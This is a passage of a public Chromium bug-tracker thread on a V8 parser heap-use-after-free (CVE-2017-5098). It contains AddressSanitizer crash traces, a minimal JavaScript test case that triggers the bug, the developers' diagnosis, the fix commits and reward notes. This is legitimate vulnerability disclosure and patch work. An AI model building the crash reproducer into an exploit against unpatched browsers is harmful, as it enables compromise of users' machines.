    #21 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #22 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #23 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #24 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #25 0x555cd12d9e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #26 0x555cd12d31cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #27 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #28 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #29 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #30 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #31 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #32 0x555cd12be295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #33 0x555cd12f48c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #34 0x555cd12f48c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #35 0x555cd12e59bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #36 0x555cd12b303e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #37 0x555cd1245fec in ParseStatementList src/parsing/parser-base.h:1263:32
    #38 0x555cd1245fec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #39 0x555cd124496b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14

SUMMARY: AddressSanitizer: heap-use-after-free src/ast/scopes.h:1018:9 in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)>
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==37066==ABORTING
➜  v8 git:(master) out/x64.release/d8 ~/test.js
=================================================================
==37276==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x56267d47a0e0 bp 0x7ffc59fe1d30 sp 0x7ffc59fe1d28
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x56267d47a0df in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)> src/ast/scopes.h:1018:9
    #1 0x56267d47a0df in v8::internal::DeclarationScope::AllocateLocals() src/ast/scopes.cc:2260
    #2 0x56267d4753ee in AllocateNonParameterLocalsAndDeclaredGlobals src/ast/scopes.cc:2240:27
    #3 0x56267d4753ee in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2304
    #4 0x56267d475267 in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2290:12
    #5 0x56267d46ded2 in v8::internal::DeclarationScope::AllocateVariables(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:1337:3
    #6 0x56267d46d916 in v8::internal::DeclarationScope::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:673:10
    #7 0x56267d62bf5b in v8::internal::Compiler::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::ThreadedList<v8::internal::ThreadedListZoneEntry<v8::internal::FunctionLiteral*> >*) src/compiler.cc:1133:3
    #8 0x56267d63e4e7 in Analyze src/compiler.cc:1143:10
    #9 0x56267d63e4e7 in v8::internal::(anonymous namespace)::CompileUnoptimizedCode(v8::internal::CompilationInfo*, v8::internal::ConcurrencyMode) src/compiler.cc:552
    #10 0x56267d633984 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1098:10
    #11 0x56267d637d80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14
    #12 0x56267d367543 in v8::ScriptCompiler::CompileUnboundInternal(v8::Isolate*, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2241:14
    #13 0x56267d368ac6 in v8::ScriptCompiler::Compile(v8::Local<v8::Context>, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2300:16
    #14 0x56267d3067d8 in v8::Shell::CompileString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::ScriptCompiler::CompileOptions) src/d8.cc:536:12
    #15 0x56267d306bdb in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, bool, bool) src/d8.cc:572:10
    #16 0x56267d31b883 in v8::SourceGroup::Execute(v8::Isolate*) src/d8.cc:2344:10
    #17 0x56267d321f76 in v8::Shell::RunMain(v8::Isolate*, int, char**, bool) src/d8.cc:2774:34
    #18 0x56267d3255c0 in v8::Shell::Main(int, char**) src/d8.cc:3224:16
    #19 0x7f3bcc26ef44 in __libc_start_main /build/eglibc-SvCtMH/eglibc-2.19/csu/libc-start.c:287

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x56267d2d7532 in __interceptor_free (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f532)
    #1 0x56267e8e106e in DeleteAll src/zone/zone.cc:104:17
    #2 0x56267e8e106e in v8::internal::Zone::~Zone() src/zone/zone.cc:60
    #3 0x56267e26fe6b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2802:3
    #4 0x56267e2e3be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #5 0x56267e2d627a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #6 0x56267e2cea5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #7 0x56267e2f9ae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #8 0x56267e2f2936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #9 0x56267e2eb616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #10 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #11 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #12 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #13 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #14 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #15 0x56267e2f3e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #16 0x56267e2ed1cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #17 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #18 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #19 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #20 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #21 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #22 0x56267e2d8295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #23 0x56267e30e8c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #24 0x56267e30e8c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #25 0x56267e2ff9bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #26 0x56267e2cd03e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #27 0x56267e25ffec in ParseStatementList src/parsing/parser-base.h:1263:32
    #28 0x56267e25ffec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #29 0x56267e25e96b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14
    #30 0x56267e339cb2 in v8::internal::parsing::ParseProgram(v8::internal::ParseInfo*, v8::internal::Isolate*, bool) src/parsing/parsing.cc:29:19
    #31 0x56267d633ae2 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1064:12
    #32 0x56267d637d80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14

previously allocated by thread T0 here:
    #0 0x56267d2d7873 in __interceptor_malloc (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f873)
    #1 0x56267e8e09b9 in AllocateSegment src/zone/accounting-allocator.cc:85:18
    #2 0x56267e8e09b9 in v8::internal::AccountingAllocator::GetSegment(unsigned long) src/zone/accounting-allocator.cc:75
    #3 0x56267e8e1345 in NewSegment src/zone/zone.cc:116:33
    #4 0x56267e8e1345 in v8::internal::Zone::NewExpand(unsigned long) src/zone/zone.cc:164
    #5 0x56267e8e11cb in v8::internal::Zone::New(unsigned long) src/zone/zone.cc:79:14
    #6 0x56267e24c027 in New src/zone/zone.h:139:43
    #7 0x56267e24c027 in NewData src/list.h:183
    #8 0x56267e24c027 in Initialize src/list.h:172
    #9 0x56267e24c027 in List src/list.h:39
    #10 0x56267e24c027 in ZoneList src/zone/zone.h:157
    #11 0x56267e24c027 in v8::internal::FuncNameInferrer::FuncNameInferrer(v8::internal::AstValueFactory*, v8::internal::Zone*) src/parsing/func-name-inferrer.cc:18
    #12 0x56267e26ec1b in DiscardableZoneScope src/parsing/parser.cc:114:9
    #13 0x56267e26ec1b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2712
    #14 0x56267e2e3be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #15 0x56267e2d627a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #16 0x56267e2cea5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #17 0x56267e2f9ae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #18 0x56267e2f2936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #19 0x56267e2eb616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #20 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #21 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #22 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #23 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #24 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #25 0x56267e2f3e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #26 0x56267e2ed1cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #27 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #28 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #29 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #30 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #31 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #32 0x56267e2d8295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #33 0x56267e30e8c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #34 0x56267e30e8c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #35 0x56267e2ff9bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #36 0x56267e2cd03e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #37 0x56267e25ffec in ParseStatementList src/parsing/parser-base.h:1263:32
    #38 0x56267e25ffec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #39 0x56267e25e96b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14

SUMMARY: AddressSanitizer: heap-use-after-free src/ast/scopes.h:1018:9 in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)>
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==37276==ABORTING

Status: Started
Reduced test case:

({
   m() {
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x;
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     // Reference 201:
     x;
   }
})  

The magic number 201 is due to:

  // Under some circumstances, we allow preparsing to abort if the preparsed
  // function is "long and trivial", and fully parse instead. Our current
  // definition of "long and trivial" is:
  // - over kLazyParseTrialLimit statements
  // - all starting with an identifier (i.e., no if, for, while, etc.)
  static const int kLazyParseTrialLimit = 200;

So this crashes when we abort lazy parsing. Still digging into why that happens.
Got it, we were missing rare_data_ nullification after aborting. CL on the way.
Cc: ca...@igalia.com
+caitp so she can see the bug while reviewing
Project Member Comment 13 by bugdroid1@chromium.org, Jul 12
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/b56c0f7a7ecb5254a4f785b929f9cee346a40566

commit b56c0f7a7ecb5254a4f785b929f9cee346a40566
Author: Adam Klein <adamk@chromium.org>
Date: Wed Jul 12 20:26:10 2017

[scope] Null out rare_data_ when aborting preparsing

When we abort preparsing, we have to reset the Scope state, to ensure
re-parsing will leave us in the proper Zone. Resetting of rare_data_
was missing, causing this to fail in some cases.

Bug: chromium:740803
Change-Id: I7ce70f9c4670eaf1b76745ae8231eb95625b0f4b
Reviewed-on: https://chromium-review.googlesource.com/568784
Reviewed-by: Caitlin Potter <caitp@igalia.com>
Commit-Queue: Adam Klein <adamk@chromium.org>
Cr-Commit-Position: refs/heads/master@{#46607}
[modify] https://crrev.com/b56c0f7a7ecb5254a4f785b929f9cee346a40566/src/ast/scopes.cc
[add] https://crrev.com/b56c0f7a7ecb5254a4f785b929f9cee346a40566/test/mjsunit/regress/regress-crbug-740803.js

Labels: M-60 M-61 Merge-Request-60
Status: Fixed
This is a super-safe fix for a use-after-free, so requesting backmerge to M-60.
Project Member Comment 15 by sheriffbot@chromium.org, Jul 12
Labels: -Merge-Request-60 Hotlist-Merge-Review Merge-Review-60
This bug requires manual review: We are only 12 days from stable.
Please contact the milestone owner if you have questions.
Owners: amineer@(Android), cmasso@(iOS), josafat@(ChromeOS), bustamante@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 16 by sheriffbot@chromium.org, Jul 13
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -Merge-Review-60 Merge-Approved-60
Project Member Comment 18 by bugdroid1@chromium.org, Jul 17
Labels: merge-merged-6.0
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50

commit 7d00aa24e80fd144cee8c8c2d62305b1aaa38a50
Author: Adam Klein <adamk@chromium.org>
Date: Mon Jul 17 17:17:15 2017

Merged: [scope] Null out rare_data_ when aborting preparsing

Revision: b56c0f7a7ecb5254a4f785b929f9cee346a40566

BUG=chromium:740803
LOG=N
NOTRY=true
NOPRESUBMIT=true
NOTREECHECKS=true
R=jkummerow@chromium.org

Change-Id: Ib9577a20723fd1aa878eeb2284ac60ca997225d3
Reviewed-on: https://chromium-review.googlesource.com/574755
Reviewed-by: Jakob Kummerow <jkummerow@chromium.org>
Cr-Commit-Position: refs/branch-heads/6.0@{#77}
Cr-Branched-From: 97dbf624a5eeffb3a8df36d24cdb2a883137385f-refs/heads/6.0.286@{#1}
Cr-Branched-From: 12e6f1cb5cd9616da7b9d4a7655c088778a6d415-refs/heads/master@{#45439}
[modify] https://crrev.com/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50/src/ast/scopes.cc
[add] https://crrev.com/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50/test/mjsunit/regress/regress-crbug-740803.js

Labels: -Merge-Approved-60 Merge-Merged-60
Labels: Release-0-M60
Labels: reward-topanel
Labels: CVE-2017-5098
Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one june901116@ - the VRP panel decided to award $3,000 for this report! A member of our finance team will be in touch shortly to arrange for payment.
Labels: -reward-unpaid reward-inprocess
Project Member Comment 26 by sheriffbot@chromium.org, Oct 19
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment